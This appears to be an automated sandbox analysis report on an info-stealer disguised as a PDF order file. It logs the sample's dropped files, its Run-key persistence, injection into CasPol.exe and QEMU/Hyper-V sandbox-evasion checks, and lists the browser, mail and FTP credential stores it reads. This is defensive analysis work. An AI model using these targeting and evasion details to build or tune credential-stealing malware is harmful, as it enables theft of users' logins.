            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\MisundesJump to behavior
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4Jump to behavior
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\PerciformJump to behavior
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Perciform\SelskabeligJump to behavior
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Perciform\Selskabelig\HjemmeopgavenJump to behavior
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Perciform\Selskabelig\Hjemmeopgaven\vrkstedsbygningerJump to behavior
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Perciform\Selskabelig\Hjemmeopgaven\vrkstedsbygninger\Ricciaceae185.IncJump to behavior
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209Jump to behavior
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\FanControlWrapper.dllJump to behavior
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\Microsoft.Office.Tools.Common.v9.0.dllJump to behavior
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\edit-cut-symbolic.svgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run flexJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run flexJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\flex\flex.exe:Zone.Identifier read attributes | delete
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990362848.00000000038B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOKERNELBASE.DLLSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990362848.00000000038B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39988097728.0000000000928000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39988097728.0000000000928000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2560Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\flex\flex.exe TID: 5948Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\flex\flex.exe TID: 7612Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd84B6.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\Microsoft.Office.Tools.Common.v9.0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\FanControlWrapper.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9410
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeCode function: 1_2_004065A2 FindFirstFileW,FindClose,
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeCode function: 1_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSystem information queried: ModuleInformation
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeAPI call chain: ExitProcess graph end node
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990362848.00000000038B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoKERNELBASE.DLLshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000009.00000002.44498257269.0000000001498000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44499138063.00000000014F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990362848.00000000038B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39988097728.0000000000928000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39988097728.0000000000928000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeQueries volume information: C:\Users\user\AppData\Roaming\flex\flex.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeQueries volume information: C:\Users\user\AppData\Roaming\flex\flex.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeCode function: 1_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4428, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: Yara matchFile source: 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4428, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4428, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Ingress Tool Transfer
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default AccountsScheduled Task/Job11
            Registry Run Keys / Startup Folder
            1
